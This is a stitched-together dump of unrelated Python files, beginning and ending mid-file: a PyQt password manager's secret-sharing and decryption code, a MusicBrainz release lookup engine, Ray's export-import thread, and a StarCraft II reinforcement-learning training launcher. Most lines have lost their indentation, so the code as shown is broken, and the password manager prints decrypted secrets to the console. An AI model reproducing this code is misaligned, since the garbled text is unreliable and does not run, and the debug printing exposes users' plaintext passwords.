secretEntry["users"][Midtier.session._user]["encryptedKey"]
)
self.sigMessage.emit("Decrypting the AES key")
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
hmacKey = origKeyPair[32:]
self.sigMessage.emit("Encrypting the AES key for " + username)
            # Share both the AES key and the HMAC key, matching the key layout produced in _addPassword
            encryptedKey2 = self.crypto.encryptRSA(pubKey, origKeyPair)
            self.sigMessage.emit("Sharing the secret with " + username)
client.shareSecret(sid, username, self.crypto.encode(encryptedKey2))
self.sigMessage.emit("Shared the secret " + username)
except Exception as e:
traceback.print_exc()
self.sigMessage.emit("")
self.error.emit(str(e))
@pyqtSlot()
def decryptSecrets(self):
threading.Thread(target=(lambda: self._decryptSecrets())).start()
def _decryptSecrets(self):
self.sigMessage.emit("Decrypting secrets")
numSecrets = len(Midtier.session._secrets)
count = 0
user = Midtier.session._user
privKey = Midtier.session._privKey
failed = 0
for key in Midtier.session._secrets.keys():
count = count + 1
self.sigMessage.emit(
"Decrypting secret " + str(count + 1) + "/" + str(numSecrets)
)
try:
esecret = Midtier.session._secrets[key]
# print("key="+str(esecret))
if "users" in esecret and user in esecret["users"]:
encryptedKey = self.crypto.decode(
esecret["users"][user]["encryptedKey"]
)
encryptedSecret = esecret["encryptedSecret"]
origKeyPair = self.crypto.decryptRSA(privKey, encryptedKey)
origKey = origKeyPair[0:32]
origSecretText = self.crypto.decrypt(origKey, encryptedSecret)
origSecret = json.loads(origSecretText.decode("utf-8"))
origSecret["sid"] = key
# If the secret has the new format where each user specifies the category in a dict:
if "userCategory" in origSecret and user in origSecret["userCategory"]:
# print("before transform: "+json.dumps(origSecret,indent=2))
origSecret["category"] = origSecret["userCategory"][user]
if "type" in origSecret:
if origSecret["type"] == "password":
with Midtier.session._lock:
self.updatePasswordCategoryInfo(origSecret)
Midtier.session._passwords.append(origSecret)
Midtier.session._passwordsModCounter += 1
elif origSecret["type"] == "passwordCategories":
Midtier.session._categorySid = origSecret["sid"]
print(json.dumps(origSecret, indent=2))
if "categories" in origSecret:
with Midtier.session._lock:
self._updateCategoryList(origSecret)
else:
print(json.dumps(origSecret, indent=2))
self.sigDecryptedSecret.emit(origSecret)
if count % 10 == 0:
self._yield()
except:
failed = failed + 1
traceback.print_exc()
if failed == 1:
self.sigMessage.emit("Failed to deccrypt one secret")
elif failed > 1:
self.sigMessage.emit("Failed to deccrypt " + str(failed) + " secrets")
else:
self.sigMessage.emit("")
def _updateCategoryList(self, origSecret):
Midtier.session._categories = origSecret["categories"]
Midtier.session._categoriesList = []
for catId in Midtier.session._categories.keys():
catObj = {"id": catId}
catObj["text"] = Midtier.session._categories[catId]["label"]
catObj["foreground"] = self.getForegroundColor(
Midtier.session._categories[catId]["backgroundColor"]
)
catObj["background"] = (
"#" + Midtier.session._categories[catId]["backgroundColor"]
)
Midtier.session._categoriesList.append(catObj)
for password in Midtier.session._passwords:
self.updatePasswordCategoryInfo(password)
def updatePasswordCategoryInfo(self, password):
password["categoryLabel"] = "Unknown"
password["categoryBackground"] = "Transparent"
password["categoryForeground"] = "Transparent"
catInfo = None
if (
"category" in password
and password["category"] in Midtier.session._categories
):
catInfo = Midtier.session._categories[password["category"]]
        if catInfo is not None:
password["categoryBackground"] = "#" + catInfo["backgroundColor"].upper()
password["categoryLabel"] = catInfo["label"]
password["categoryForeground"] = self.getForegroundColor(
catInfo["backgroundColor"]
)
@pyqtSlot()
def downloadPrivateKey(self):
threading.Thread(target=(lambda: self._downloadPrivateKey())).start()
def _downloadPrivateKey(self):
try:
self.sigMessage.emit("Logging in with password")
Midtier.session.client = client.Client(
client.ClientRestInterface(Midtier.session._url)
)
Midtier.session.client.login(
Midtier.session._user, Midtier.session._password
)
Midtier.session._encryptedPrivateKey = Midtier.session.client.getUserPrivateKey(
Midtier.session._user, Midtier.session._password
).decode(
"ascii"
)
self.sigDownloadKey.emit(Midtier.session._encryptedPrivateKey)
except Exception as e:
traceback.print_exc()
self.clearSession()
self.error.emit(str(e))
@pyqtSlot()
def listUsers(self):
print("listUsers()")
threading.Thread(target=(lambda: self._listUsers())).start()
def _listUsers(self):
try:
Midtier.session._users = Midtier.session.client.listUsers()
print("users=" + str(Midtier.session._users))
self.sigUsersListed.emit()
except Exception as e:
traceback.print_exc()
self.clearSession()
self.error.emit(str(e))
@pyqtSlot()
def login(self):
threading.Thread(target=(lambda: self._login())).start()
def _login(self):
try:
Midtier.session._privKey = self.helper.decryptPrivateKey(
Midtier.session._user,
Midtier.session._encryptedPrivateKey,
Midtier.session._password,
)
return True
except Exception as e:
traceback.print_exc()
self.clearSession()
self.error.emit(str(e))
return False
@pyqtSlot(str)
def updateClipboard(self, value):
QGuiApplication.clipboard().setText(value)
QGuiApplication.clipboard().setText(value, QClipboard.Selection)
self.sigMessage.emit("Copied to clipboard")
def _yield(self):
# Release the GIL
time.sleep(0.1)
def getForegroundColor(self, bg):
# http://stackoverflow.com/questions/1855884/determine-font-color-based-on-background-color
# Counting the perceptive luminance - human eye favors green color...
        bg = str(bg).replace("#", "")
        # after stripping any leading '#', the hex string is RRGGBB
        r = 0.299 * int(bg[0:2], 16)
        g = 0.587 * int(bg[2:4], 16)
        b = 0.114 * int(bg[4:6], 16)
a = 1.0 - ((r + g + b) / 255.0)
if a < 0.5:
return "#000000"
else:
return "#FFFFFF"
def sigint_handler(*args):
sys.stderr.write("\r")
QGuiApplication.quit()
if __name__ == "__main__":
signal.signal(signal.SIGINT, sigint_handler)
app = QGuiApplication(sys.argv)
# Get the interpreter to run so that the signal handler will actually
# execute when the user hits control-c
# https://stackoverflow.com/questions/4938723/what-is-the-correct-way-to-make-my-pyqt-application-quit-when-killed-from-the-co
timer = QTimer()
timer.start(500) # You may change this if you wish.
timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
# Get the correct basepath in all scenarios
if getattr(sys, "frozen", False):
basepath = sys._MEIPASS
else:
basepath = os.path.dirname(os.path.realpath(__file__))
if len(basepath) == 0:
basepath = "."
basepath = os.path.abspath(basepath).replace("\\", "/")
if basepath.find(":") > 0:
basepath = "file:///" + basepath
qmlRegisterType(Midtier, "CPMQ", 1, 0, "Midtier")
qmlRegisterType(MyProxyModel, "CPMQ", 1, 0, "PasswordModel")
qmlRegisterType(PasswordInfo, "CPMQ", 1, 0, "PasswordInfo")
Midtier.session = Session()
# if os.name!='nt':
app.setWindowIcon(QIcon(basepath + "/ui/icon.png"))
print("Using icon: " + basepath + "/ui/icon.png")
# else:
# app.setWindowIcon(QIcon(basepath + '/ui/icon.ico'))
# print("Using icon: "+basepath + '/ui/icon.ico')
engine = QQmlApplicationEngine()
# for the pyinstaller-extracted qml system imports
engine.addImportPath(basepath + "/_qml")
rootContext = engine.rootContext()
rootContext.setContextProperty("qmlBasePath", basepath + "/ui")
print("QML Import dirs: " + str(engine.importPathList()))
qmlFile = basepath + "/ui/main.qml"
print("Loading " + qmlFile)
engine.load(QUrl(qmlFile))
sys.exit(app.exec_())
|
musicBrainz.py
|
import json
import threading
from queue import Queue
from io import StringIO
from urllib import request
import arrow
import musicbrainzngs
from resources.common import *
from searchEngines.searchEngineBase import SearchEngineBase, ThreadData
from searchEngines.models.Artist import Artist, ArtistType
from searchEngines.models.Label import Label
from searchEngines.models.Release import Release
from searchEngines.models.ReleaseLabel import ReleaseLabel
from searchEngines.models.ReleaseMedia import ReleaseMedia
from searchEngines.models.Track import Track
class MusicBrainz(SearchEngineBase):
IsActive = True
threadDataType = "musicBrainz"
lock = threading.Lock()
que = Queue()
cache = dict()
artistReleasesThreaded = []
def __init__(self, referer=None):
self.artists = {}
self.searchReleases = {}
self.releases = {}
SearchEngineBase.__init__(self, referer)
musicbrainzngs.set_useragent("Roadie", "0.1", self.referer)
def lookupArtist(self, name):
results = musicbrainzngs.search_artists(artist=name)
if results and 'artist-list' in results and results['artist-list']:
result = None
for artistResult in results['artist-list']:
if 'name' in artistResult:
if isEqual(artistResult['name'], name):
result = artistResult
break
if result:
return self.lookupArtistByMusicBrainzId(result['id'])
return None
def lookupArtistByMusicBrainzId(self, musicBrainzId, fetchReleases=False):
if not musicBrainzId:
raise RuntimeError("Invalid MusicBrainzId")
try:
artist = None
self.logger.debug("Performing MusicBrainz Lookup For Artist")
results = musicbrainzngs.get_artist_by_id(musicBrainzId, includes=['tags', 'aliases', 'url-rels'])
if results and results['artist']:
result = results['artist']
if result:
artist = Artist(name=result['name'])
artist.musicBrainzId = result['id']
artist.artistType = ArtistType.Person
if 'type' in result and isEqual(result['type'], "group"):
artist.artistType = ArtistType.Group
artist.sortName = result['sort-name']
if 'isni-list' in result:
artist.isniList = []
for isni in result['isni-list']:
if not isInList(artist.isniList, isni):
artist.isniList.append(isni)
if 'life-span' in result:
if 'begin' in result['life-span']:
artist.beginDate = result['life-span']['begin']
if 'end' in result['life-span']:
artist.endDate = result['life-span']['end']
if 'alias-list' in result:
artist.alternateNames = []
for alias in result['alias-list']:
aliasName = alias['alias']
if not isInList(artist.alternateNames, aliasName):
artist.alternateNames.append(aliasName)
if 'url-relation-list' in result:
artist.urls = []
for url in result['url-relation-list']:
target = url['target']
imageType = url['type']
if imageType != "image":
if not isInList(artist.urls, target):
artist.urls.append(target)
if 'tag-list' in result:
artist.tags = []
for tag in result['tag-list']:
if not isInList(artist.tags, tag['name']):
artist.tags.append(tag['name'])
if artist and fetchReleases:
artist.releases = self.lookupAllArtistsReleases(artist)
# print(artist.info())
return artist
except:
self.logger.exception("MusicBrainz: Error In LookupArtist")
pass
return None
def searchForRelease(self, artist, title):
try:
if artist.roadieId in self.cache and not title:
self.logger.debug(
"Found Artist: roadieId [" + artist.roadieId + "] name [" + artist.name + "] in MusicBrainz Cache.")
return self.cache[artist.roadieId]
if not artist.musicBrainzId:
artist = self.lookupArtist(artist.name)
if not artist or not artist.musicBrainzId:
return None
if artist.roadieId not in self.cache:
self.cache[artist.roadieId] = self.lookupAllArtistsReleases(artist)
else:
self.logger.debug(
"Found Artist: roadieId [" + artist.roadieId + "] name [" + artist.name + "] in MusicBrainz Cache.")
if title:
foundRelease = None
for release in self.cache[artist.roadieId]:
if isEqual(release.title, title):
foundRelease = release
break
if foundRelease:
releases = [foundRelease]
return releases
else:
return None
return self.cache[artist.roadieId]
except:
self.logger.exception("MusicBrainz: Error In LookupArtist")
pass
def lookupAllArtistsReleases(self, artist):
mbReleases = musicbrainzngs.browse_releases(artist=artist.musicBrainzId)
if mbReleases and 'release-list' in mbReleases:
for x in range(self.threadCount):
t = threading.Thread(target=self.threader)
t.daemon = True
t.start()
for mbRelease in mbReleases['release-list']:
self.que.put(ThreadData(self.threadDataType, mbRelease['id']))
self.que.join()
return self.artistReleasesThreaded
return None
def threader(self):
while True:
threadData = self.que.get()
if threadData.threadDataType == self.threadDataType:
self.threaderLookupRelease(threadData.data)
self.que.task_done()
def threaderLookupRelease(self, releaseMusicBrainzId):
release = self.lookupReleaseByMusicBrainzId(releaseMusicBrainzId)
if release:
with self.lock:
if release in self.artistReleasesThreaded:
for r in self.artistReleasesThreaded:
if r == release:
r.mergeWithRelease(release)
else:
self.artistReleasesThreaded.append(release)
def lookupReleaseByMusicBrainzId(self, musicBrainzId):
try:
if not musicBrainzId:
raise RuntimeError("Invalid MusicBrainzId")
release = None
self.logger.debug("Performing MusicBrainz Lookup For Album(s) [" + musicBrainzId + "]")
mbReleaseById = musicbrainzngs.get_release_by_id(id=musicBrainzId,
includes=['labels', 'aliases', 'recordings',
'release-groups', 'media', 'url-rels'])
if mbReleaseById:
releaseLabels = []
releaseMedia = []
trackCount = 0
coverUrl = self._getCoverArtUrl(musicBrainzId)
if 'release' in mbReleaseById:
mbRelease = mbReleaseById['release']
releaseDate = None
releaseType = None
if 'release-group' in mbRelease and mbRelease['release-group']:
if 'first-release-date' in mbRelease['release-group'] and mbRelease['release-group'][
'first-release-date']:
releaseDate = parseDate(mbRelease['release-group']['first-release-date'])
if 'type' in mbRelease['release-group'] and mbRelease['release-group']['type']:
releaseType = mbRelease['release-group']['type']
if not releaseType and 'primary-type' in mbRelease['release-group'] and \
mbRelease['release-group']['primary-type']:
releaseType = mbRelease['release-group']['primary-type']
release = Release(title=mbRelease['title'], releaseDate=releaseDate)
release.releaseType = releaseType
if 'label-info-list' in mbRelease:
labelsFound = []
for labelInfo in mbRelease['label-info-list']:
if 'label' in labelInfo and 'name' in labelInfo['label']:
label = None
labelName = labelInfo['label']['name']
if labelName not in labelsFound:
if labelName:
label = Label(name=labelName)
label.musicBrainzId = labelInfo['label']['id']
labelSortName = labelInfo['label']['sort-name']
label.sortName = labelSortName or labelName
if 'alias-list' in labelInfo['label']:
label.alternateNames = []
for alias in labelInfo['label']['alias-list']:
if not isInList(label.alternateNames, alias['alias']):
label.alternateNames.append(alias['alias'])
catalogNumber = None
if 'catalog-number' in labelInfo:
catalogNumber = labelInfo['catalog-number']
releaseLabels.append(
ReleaseLabel(catalogNumber=catalogNumber, label=label, release=release))
labelsFound.append(labelName)
if 'medium-list' in mbRelease:
for medium in mbRelease['medium-list']:
releaseMediaNumber = medium['position']
media = ReleaseMedia(releaseMediaNumber=releaseMediaNumber)
media.tracks = []
if 'track-list' in medium and medium['track-list']:
for mbTrack in medium['track-list']:
track = Track(title=mbTrack['recording']['title'])
if 'length' in mbTrack:
track.duration = mbTrack['length']
track.trackNumber = mbTrack['position']
track.releaseMediaNumber = releaseMediaNumber
track.musicBrainzId = mbTrack['id']
if not ([t for t in media.tracks if t.trackNumber == track.trackNumber]):
media.tracks.append(track)
trackCount += len(media.tracks)
media.trackCount = len(media.tracks)
releaseMedia.append(media)
release.trackCount = trackCount
release.coverUrl = coverUrl
release.musicBrainzId = musicBrainzId
release.media = releaseMedia
release.mediaCount = len(releaseMedia)
release.releaseLabels = releaseLabels
if not release.alternateNames:
release.alternateNames = []
cleanedTitle = createCleanedName(release.title)
if cleanedTitle not in release.alternateNames and cleanedTitle != release.title:
release.alternateNames.append(cleanedTitle)
return release
except:
self.logger.exception("MusicBrainy: Error In SearchForRelease")
pass
return None
def _getCoverArtUrl(self, musicBrainzId):
try:
url = "http://coverartarchive.org/release/" + musicBrainzId + "/"
rq = request.Request(url=url)
rq.add_header('Referer', self.referer)
with request.urlopen(rq) as f:
try:
s = StringIO((f.read().decode('utf-8')))
o = json.load(s)
r = o['images']
if r:
for image in r:
if image['front'] == "true":
return image['image']
except:
pass
except:
pass
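# Sketch of the Cover Art Archive response that _getCoverArtUrl() walks; field names match the
# lookups above, the URL values are placeholders only:
#   GET http://coverartarchive.org/release/<musicBrainzId>/
#   {"images": [{"front": true, "image": "https://coverartarchive.org/.../front.jpg"}, ...]}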
# a = MusicBrainz()
# artist = a.lookupArtist('Danger Danger')
# #uprint(artist.info())
#
# release = a.lookupReleaseByMusicBrainzId("ae694c34-dbf4-31a3-89fc-1f2328ed53f4")
# uprint(release.info())
#
# release = a.lookupReleaseByMusicBrainzId("2990c4bd-d04f-4319-93a5-d95515bfb493")
# print(release.info())
#
# #r = a.lookupAllArtistsReleases(artist)
# # #release = a.searchForRelease(artist, "Cold Spring Harbor")
# #r = a.lookupReleaseByMusicBrainzId('038acd9c-b845-461e-ae76-c4f3190fc774')
# #print(r)
# # #print(artist.info())
# #print(release.info())
|
import_thread.py
|
from collections import defaultdict
import threading
import traceback
import redis
import ray
from ray import ray_constants
from ray import cloudpickle as pickle
from ray import profiling
from ray import utils
import logging
logger = logging.getLogger(__name__)
class ImportThread:
"""A thread used to import exports from the driver or other workers.
Note: The driver also has an import thread, which is used only to import
custom class definitions from calls to _register_custom_serializer that
happen under the hood on workers.
Attributes:
worker: the worker object in this process.
mode: worker mode
redis_client: the redis client used to query exports.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
imported_collision_identifiers: This is a dictionary mapping collision
identifiers for the exported remote functions and actor classes to
the number of times that collision identifier has appeared. This is
used to provide good error messages when the same function or class
is exported many times.
"""
def __init__(self, worker, mode, threads_stopped):
self.worker = worker
self.mode = mode
self.redis_client = worker.redis_client
self.threads_stopped = threads_stopped
self.imported_collision_identifiers = defaultdict(int)
def start(self):
"""Start the import thread."""
self.t = threading.Thread(target=self._run, name="ray_import_thread")
# Making the thread a daemon causes it to exit
# when the main thread exits.
self.t.daemon = True
self.t.start()
def join_import_thread(self):
"""Wait for the thread to exit."""
self.t.join()
def _run(self):
import_pubsub_client = self.redis_client.pubsub()
# Exports that are published after the call to
# import_pubsub_client.subscribe and before the call to
# import_pubsub_client.listen will still be processed in the loop.
import_pubsub_client.subscribe("__keyspace@0__:Exports")
# Keep track of the number of imports that we've imported.
num_imported = 0
try:
# Get the exports that occurred before the call to subscribe.
export_keys = self.redis_client.lrange("Exports", 0, -1)
for key in export_keys:
num_imported += 1
self._process_key(key)
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = import_pubsub_client.get_message()
if msg is None:
self.threads_stopped.wait(timeout=0.01)
continue
if msg["type"] == "subscribe":
continue
assert msg["data"] == b"rpush"
num_imports = self.redis_client.llen("Exports")
assert num_imports >= num_imported
for i in range(num_imported, num_imports):
num_imported += 1
key = self.redis_client.lindex("Exports", i)
self._process_key(key)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error("ImportThread: {}".format(e))
finally:
# Close the pubsub client to avoid leaking file descriptors.
import_pubsub_client.close()
def _get_import_info_for_collision_detection(self, key):
"""Retrieve the collision identifier, type, and name of the import."""
if key.startswith(b"RemoteFunction"):
collision_identifier, function_name = (self.redis_client.hmget(
key, ["collision_identifier", "function_name"]))
return (collision_identifier, ray.utils.decode(function_name),
"remote function")
elif key.startswith(b"ActorClass"):
collision_identifier, class_name = self.redis_client.hmget(
key, ["collision_identifier", "class_name"])
return collision_identifier, ray.utils.decode(class_name), "actor"
def _process_key(self, key):
"""Process the given export key from redis."""
if self.mode != ray.WORKER_MODE:
# If the same remote function or actor definition appears to be
# exported many times, then print a warning. We only issue this
# warning from the driver so that it is only triggered once instead
# of many times. TODO(rkn): We may want to push this to the driver
# through Redis so that it can be displayed in the dashboard more
# easily.
if (key.startswith(b"RemoteFunction")
or key.startswith(b"ActorClass")):
collision_identifier, name, import_type = (
self._get_import_info_for_collision_detection(key))
self.imported_collision_identifiers[collision_identifier] += 1
if (self.imported_collision_identifiers[collision_identifier]
== ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD):
logger.warning(
"The %s '%s' has been exported %s times. It's "
"possible that this warning is accidental, but this "
"may indicate that the same remote function is being "
"defined repeatedly from within many tasks and "
"exported to all of the workers. This can be a "
"performance issue and can be resolved by defining "
"the remote function on the driver instead. See "
"https://github.com/ray-project/ray/issues/6240 for "
"more discussion.", import_type, name,
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD)
if key.startswith(b"RemoteFunction"):
with profiling.profile("register_remote_function"):
(self.worker.function_actor_manager.
fetch_and_register_remote_function(key))
elif key.startswith(b"FunctionsToRun"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
elif key.startswith(b"ActorClass"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this worker
# into an actor of that class.
self.worker.function_actor_manager.imported_actor_classes.add(key)
# TODO(rkn): We may need to bring back the case of
# fetching actor classes here.
else:
raise Exception("This code should be unreachable.")
def fetch_and_execute_function_to_run(self, key):
"""Run on arbitrary function on the worker."""
(job_id, serialized_function,
run_on_other_drivers) = self.redis_client.hmget(
key, ["job_id", "function", "run_on_other_drivers"])
if (utils.decode(run_on_other_drivers) == "False"
and self.worker.mode == ray.SCRIPT_MODE
and job_id != self.worker.current_job_id.binary()):
return
try:
# FunctionActorManager may call pickle.loads at the same time.
# Importing the same module in different threads causes deadlock.
with self.worker.function_actor_manager.lock:
# Deserialize the function.
function = pickle.loads(serialized_function)
# Run the function.
function({"worker": self.worker})
except Exception:
# If an exception was thrown when the function was run, we record
# the traceback and notify the scheduler of the failure.
traceback_str = traceback.format_exc()
# Log the error message.
utils.push_error_to_driver(
self.worker,
ray_constants.FUNCTION_TO_RUN_PUSH_ERROR,
traceback_str,
job_id=ray.JobID(job_id))
|
eval_mini_srcgame_worldmodel.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "0,1,2,3"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_worldmodel as mini_source_agent
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from mini_network_worldmodel import MiniNetwork
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
flags.DEFINE_string("restore_model_path", "./model/20190122-215114_source/", "path for restore model")
flags.DEFINE_bool("restore_model", False, "Whether to restore old model")
flags.DEFINE_integer("parallel", 4, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 4370, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
FLAGS(sys.argv)
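# A sketch of a local launch; flag names are defined above, the values are illustrative only:
#   python eval_mini_srcgame_worldmodel.py --on_server=False --training=False \
#       --restore_model=True --restore_model_path=./model/20190122-215114_source/ \
#       --map=Simple64 --difficulty=7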
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 2
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
DEVICE = ['/gpu:' + dev for dev in FLAGS.device.split(',')]
#DEVICE = ['/cpu:0']
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variables
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
    C._FPS = 22.4 / FLAGS.step_mul  # 2.8 with the default step_mul of 8
    step_mul = FLAGS.step_mul
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_train_worldmodel()
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
Net = MiniNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = np.ceil(update_game_num // THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
return max_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_worldmodel/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_worldmodel/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Final Win_rate:', win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
